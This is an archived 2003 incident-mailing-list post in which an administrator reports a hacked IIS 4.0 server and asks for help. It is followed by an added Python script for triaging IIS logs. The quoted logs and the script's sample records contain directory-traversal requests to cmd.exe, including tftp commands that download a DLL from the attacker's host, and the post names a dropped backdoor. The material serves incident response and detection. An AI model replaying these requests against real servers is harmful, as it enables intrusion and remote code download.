Hacked web server

From: Rogelio Vidaurri Courcelle (rvidaurri@haciendachiapas.gob.mx)
Date: 01/10/03

    From: "Rogelio Vidaurri Courcelle" <rvidaurri@haciendachiapas.gob.mx>
    To: <incidents@securityfocus.com>
    Date: Fri, 10 Jan 2003 14:39:59 -0600
    
    

    Hi... my web server (NT 4.0 SP6a) was hacked last Friday. It has only
    one NIC with a public IP.
    We have an OpenBSD firewall (PF) that filters both incoming and
    outgoing traffic.... this firewall has no IP addresses.....
    External users have access to our web server only on port 80...
    We had a popup window in our default page.... I don't know if that's why
    he could hack our server.... I'm not an expert in these things.. I'm a
    beginner.....
    (my English is not perfect, sorry for the inconvenience)...
    Anyway.. we deleted that popup window and haven't been hacked again...
    We tried to patch our server but the patch "destroyed" my IIS 4.0 and we
    had to reinstall everything....
    In my LOGFILES I have the records of our visits.... and since 2 months
    ago it's been registering this:
     
    200.38.237.2, -, 5/01/03, 4:15:08, W3SVC, INGRESOS02, 200.38.152.221, 0, 72, 275, 403, 5, GET, /scripts/root.exe, /c+dir,
    200.38.237.2, -, 5/01/03, 4:15:09, W3SVC, INGRESOS02, 200.38.152.221, 0, 70, 119, 404, 2, GET, /MSADC/root.exe, /c+dir,
    200.38.237.2, -, 5/01/03, 4:15:09, W3SVC, INGRESOS02, 200.38.152.221, 125, 96, 8201, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
    200.38.237.2, -, 5/01/03, 4:15:09, W3SVC, INGRESOS02, 200.38.152.221, 125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20c:\httpodbc.dll,
    200.38.237.2, -, 5/01/03, 4:15:10, W3SVC, INGRESOS02, 200.38.152.221, 125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20d:\httpodbc.dll,
    200.38.237.2, -, 5/01/03, 4:15:10, W3SVC, INGRESOS02, 200.38.152.221, 125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20e:\httpodbc.dll,
    200.38.237.2, -, 5/01/03, 4:15:10, W3SVC, INGRESOS02, 200.38.152.221, 0, 79, 221, 500, 126, GET, /scripts/..%5c../httpodbc.dll, -,
    200.38.237.2, -, 5/01/03, 4:15:11, W3SVC, INGRESOS02, 200.38.152.221, 0, 145, 261, 500, 123, GET, /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe, /c+dir,
    200.38.237.2, -, 5/01/03, 4:15:11, W3SVC, INGRESOS02, 200.38.152.221, 0, 97, 261, 500, 123, GET, /scripts/..Á../winnt/system32/cmd.exe, /c+dir,
    200.38.237.2, -, 5/01/03, 4:15:11, W3SVC, INGRESOS02, 200.38.152.221, 16, 97, 275, 403, 5, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
    200.38.237.2, -, 5/01/03, 4:15:11, W3SVC, INGRESOS02, 200.38.152.221, 0, 97, 275, 403, 5, GET, /scripts/..À¯../winnt/system32/cmd.exe, /c+dir,
    200.38.237.2, -, 5/01/03, 4:15:11, W3SVC, INGRESOS02, 200.38.152.221, 0, 97, 275, 403, 5, GET, /scripts/..Áœ../winnt/system32/cmd.exe, /c+dir,

    I have read that it could be because of Nimda, but I have scanned with
    the latest pattern and it found no viruses... only a backdoor trojan
    called ncx99.exe dropped in mailroot\drop\temp.
    By the way, can I delete files inside that folder??? There's a
    rundlls32.exe... a KEY file, etcetera......

    What can it be? I need help...
    How could I trace the hacker??
    Thanks in advance.....
     
     
     
    ISC. Rogelio Vidaurri Courcelle
    Área de Sistemas y Web
    Secretaría de Hacienda

    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management
    and tracking system please see: http://aris.securityfocus.com
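
Added example (not part of the original post or any reply): a small Python triage script that parses IIS-format log records like the ones quoted above and flags the root.exe, backslash/overlong-UTF-8 traversal and tftp-download patterns, separating the probes the server rejected from those it answered with 200. The sample records, IPs and hostname are constructed placeholders, and the overlong byte sequences are written percent-encoded (%c0%af, %c1%9c, %c1%1c) as they travel in a raw request.

```python
"""Triage IIS-format log records for the probe patterns in the post."""
import re
from urllib.parse import unquote
# Field order of the Microsoft IIS log file format (15 comma-separated fields).
FIELDS = ("client_ip", "user", "date", "time", "service", "server",
          "server_ip", "time_taken", "bytes_in", "bytes_out", "status",
          "win32_status", "method", "uri", "query")
# Overlong UTF-8 '/' and '\' that unpatched IIS decoded after its path check.
OVERLONG = re.compile(r"%c0%af|%c1%9c|%c1%1c", re.I)

def parse_iis_line(line):
    """Return a dict of the 15 fields, or None if the line does not fit."""
    parts = [p.strip() for p in line.strip().rstrip(",").split(",")]
    return dict(zip(FIELDS, parts)) if len(parts) == len(FIELDS) else None

def classify(rec):
    """Tags explaining why a record is suspicious (empty list if clean)."""
    raw, tags = rec["uri"], []
    if OVERLONG.search(raw):
        tags.append("overlong-utf8")
    if "%5c" in raw.lower():
        tags.append("backslash-traversal")
    # Normalise: overlong bytes -> '/', percent-decode, '\' -> '/', lowercase.
    norm = unquote(OVERLONG.sub("/", raw)).replace("\\", "/").lower()
    if "/../" in norm:
        tags.append("dot-dot")
    if norm.endswith(("/cmd.exe", "/root.exe")):
        tags.append(norm.rsplit("/", 1)[1])
    if "tftp" in unquote(rec["query"]).lower():
        tags.append("tftp-download")
    return tags

def triage(lines):
    """Return (flagged, succeeded): all suspicious records, and URI+query of
    those answered with HTTP 200, i.e. the probes that actually worked."""
    flagged, succeeded = [], []
    for rec in filter(None, map(parse_iis_line, lines)):
        tags = classify(rec)
        if tags:
            flagged.append((rec["client_ip"], rec["time"], rec["status"], tags))
            if rec["status"] == "200":
                succeeded.append(rec["uri"] + " " + rec["query"])
    return flagged, succeeded

# Constructed sample records modelled on the post (placeholder IPs/hostname).
PREFIX = "192.0.2.10, -, 5/01/03, 4:15:%s, W3SVC, WEBSRV01, 198.51.100.7, "
SAMPLE_LOG = [
    PREFIX % "08" + "0, 72, 275, 403, 5, GET, /scripts/root.exe, /c+dir,",
    PREFIX % "09" + "125, 96, 8201, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,",
    PREFIX % "09" + "125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, "
                    "/c+tftp%20-i%20192.0.2.10%20GET%20cool.dll%20c:\\httpodbc.dll,",
    PREFIX % "11" + "0, 97, 275, 403, 5, GET, /scripts/..%c0%af../winnt/system32/cmd.exe, /c+dir,",
    PREFIX % "11" + "0, 300, 1200, 200, 0, GET, /default.htm, -,",
]
```

Status 403/404/500 rows are scanner noise; the rows with status 200 and a cmd.exe or tftp tag are the ones that show the host was actually exploited and what was fetched onto it.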


